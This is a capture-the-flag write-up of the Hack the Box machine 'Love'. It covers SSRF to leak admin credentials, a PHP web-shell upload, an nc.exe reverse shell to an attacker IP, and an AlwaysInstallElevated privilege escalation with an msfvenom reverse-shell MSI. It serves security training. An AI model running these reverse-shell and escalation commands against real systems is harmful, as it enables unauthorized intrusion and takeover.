Welcome Back! Let's continue with our exploration of Hack the Box (HTB) machines. Love is an easy-rated windows-based box. With that said, let us begin.
Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation
- Scanning
As usual, let's start with Nmap scan to learn more about the services that are running on this machine.
Nmap - One of the most popular port scanner tool which allows us to discover all active ports and services that are running on the target network.
We have 7 ports open, and we can also see some of the domains "staging.love.htb" and "www.love.htb" listed in the Nmap scan.
nmap -sC -sV 10.10.10.239
Exhibit 1
- Enumeration
First, let's see what is running on port 80. We have a Voting System asking for credentials to login as shown in the below Exhibit 2.
Exhibit 2
Let’s enumerate the webserver using Dirb. Dirb/Dirbuster is a tool to brute force any directory based on wordlists.
Exhibit 3
Wow, there are a whole lot of directories. The /admin directory seems like an admin panel for the Voting system. But we have not retrieved credentials for admin and default admin passwords are not working. So let us see what the other ports have for us.
When browsing the web service on port 5000, we get :
Exhibit 4
From the Nmap result, we got some interesting subdomains. Let's add this to our /etc/hosts file. We have a sub-domain "staging.love.htb" and "www.love.htb" as shown in the below Exhibit 5.
Exhibit 5
Let us visit staging.love.htb. We have a Free File Scanner hosted in this server as shown in the below Exhibit 6.
Exhibit 6
We have got a page where we can specify the file URL for it to scan.
Exhibit 7
When we provide a URL and click on "Scan file", the server actually displays the website's response.
Since the web service on port 5000 is forbidden to us, maybe we can access it via this. File Scanner service and the port 5000 web service are running on the same server, we might be able to access it via localhost. It is like we are making the server request the service on another port that is running on the same machine also known as Server Side Request Forgery (SSRF).
Exhibit 8
Great! And this time, we are successful in making the request and it reveals some credentials.
User = "admin"
Pass = "@LoveIsInTheAir!!!!"
I tried logging into all the portals we had and finally got access to the admin dashboard.
Exhibit 9
Exhibit 10
When browsing the admin dashboard, I found the profile updating option allowing us to upload a file to the server. How about we try to upload a shell?
Exhibit 11
It looks like we are successful in uploading the shell. The uploaded file was found in /images. folder.
Exhibit 12
Let's try and run a simple command "whoami" and the server is giving the response.
Exhibit 13
Now it's time to get the reverse shell, let's try simple and upload a nc.exe file in the server in the same way we uploaded our shell.
Exhibit 14
As shown in Exhibit, we can see our file nc.exe is uploaded.
Exhibit 15
Now we need to set up a listener and execute the below command.
#Netcat Listener
nc -nvlp 8888
#Execute netcat command
http://10.10.10.239/images/jagskap.php?cmd=nc.exe%2010.10.15.4%208888%20-e%20cmd.exe
Exhibit 16
Congrats!! We have a shell as user phoebe and we can read the user flag now.
- Privilege Escalation
Let us begin with WinPEAS.
WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. Upload the file to the server and just run the binary.
Exhibit 17
This will produce a pretty large output. Save the output on a file and for analyzing.
When analyzing, the main part where we might be interested in is :
Exhibit 18
We can see that the AlwaysInstallElevated is set to 1. This means we can install an MSI file with elevated privileges as an administrator. This might be a way to get an administrator on the system.
First, let us create a MSI package that will give us a reverse shell using "msfvenom".
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.4 LPORT=7777 -f msi -o reverse.msi
Exhibit 19
Now copy/upload the file to the remote box.
Exhibit 20
Let's set up a listener on the specified port and execute the MSI file using the command below -
# Cross your fingers and listen on netcat
nc -nvlp 7777
# Execute msi file
msiexec /quiet /qn /i reverse.msi
Exhibit 21
BINGO!! And here we get administrator on the system and we have the root flag.
Exhibit 22
Thus, LOVE from HackTheBox has been rooted.
Thanks for reading this far. I hope you liked it.
No comments:
Post a Comment